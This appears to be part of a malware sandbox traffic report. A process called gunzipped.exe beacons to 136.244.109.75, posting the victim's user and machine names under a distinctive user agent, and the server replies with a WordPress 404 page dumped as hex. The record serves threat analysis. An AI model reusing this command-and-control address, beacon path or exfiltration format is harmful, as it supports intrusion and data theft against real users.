                          Apr 17, 2024 03:18:43.027591944 CEST1289INData Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29
                          Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
                          Apr 17, 2024 03:18:43.027694941 CEST1289INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69
                          Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
                          Apr 17, 2024 03:18:43.027735949 CEST1289INData Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28
                          Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
                          Apr 17, 2024 03:18:43.027781010 CEST1289INData Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74
                          Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
                          Apr 17, 2024 03:18:43.027822971 CEST1289INData Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73
                          Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
                          Apr 17, 2024 03:18:43.027859926 CEST1289INData Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69
                          Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
                          Apr 17, 2024 03:18:43.027896881 CEST1289INData Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35
                          Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
                          Apr 17, 2024 03:18:43.027937889 CEST1289INData Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65
                          Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
                          Apr 17, 2024 03:18:43.027981997 CEST1289INData Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29
                          Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          73192.168.2.549787136.244.109.75804080C:\Users\user\Desktop\gunzipped.exe
                          TimestampBytes transferredDirectionData
                          Apr 17, 2024 03:18:43.385034084 CEST244OUTPOST /index.php/1748937 HTTP/1.0
                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                          Host: 136.244.109.75
                          Accept: */*
                          Content-Type: application/octet-stream
                          Content-Encoding: binary
                          Content-Key: 412D3974
                          Content-Length: 153
                          Connection: close
                          Apr 17, 2024 03:18:43.593564987 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                          Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
                          Apr 17, 2024 03:18:44.557317972 CEST1289INHTTP/1.0 404 Not Found
                          Date: Wed, 17 Apr 2024 01:18:43 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/"
                          Connection: close
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e
                          Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found &#8211; Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/*! This file is auto-generated */!function(i,n
                          Apr 17, 2024 03:18:44.557375908 CEST1289INData Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29
                          Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
                          Apr 17, 2024 03:18:44.557411909 CEST1289INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69
                          Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
                          Apr 17, 2024 03:18:44.557447910 CEST1289INData Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28
                          Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
                          Apr 17, 2024 03:18:44.557486057 CEST1289INData Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74
                          Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
                          Apr 17, 2024 03:18:44.557532072 CEST1289INData Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73
                          Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
                          Apr 17, 2024 03:18:44.557576895 CEST1289INData Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69
                          Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
                          Apr 17, 2024 03:18:44.557615042 CEST1289INData Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35
                          Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
                          Apr 17, 2024 03:18:44.557652950 CEST1289INData Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65
                          Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
                          Apr 17, 2024 03:18:44.557689905 CEST1289INData Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29
                          Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          74192.168.2.549788136.244.109.75804080C:\Users\user\Desktop\gunzipped.exe
                          TimestampBytes transferredDirectionData
                          Apr 17, 2024 03:18:44.899677992 CEST244OUTPOST /index.php/1748937 HTTP/1.0
                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                          Host: 136.244.109.75
                          Accept: */*
                          Content-Type: application/octet-stream
                          Content-Encoding: binary
                          Content-Key: 412D3974
                          Content-Length: 153
                          Connection: close
                          Apr 17, 2024 03:18:45.109710932 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                          Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
                          Apr 17, 2024 03:18:46.054307938 CEST1289INHTTP/1.0 404 Not Found
                          Date: Wed, 17 Apr 2024 01:18:44 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/"
                          Connection: close
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e
                          Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found &#8211; Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/*! This file is auto-generated */!function(i,n
                          Apr 17, 2024 03:18:46.054367065 CEST1289INData Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29
                          Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
                          Apr 17, 2024 03:18:46.054404974 CEST1289INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69
                          Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
                          Apr 17, 2024 03:18:46.054442883 CEST1289INData Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28
                          Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
                          Apr 17, 2024 03:18:46.054491997 CEST1289INData Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74
                          Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
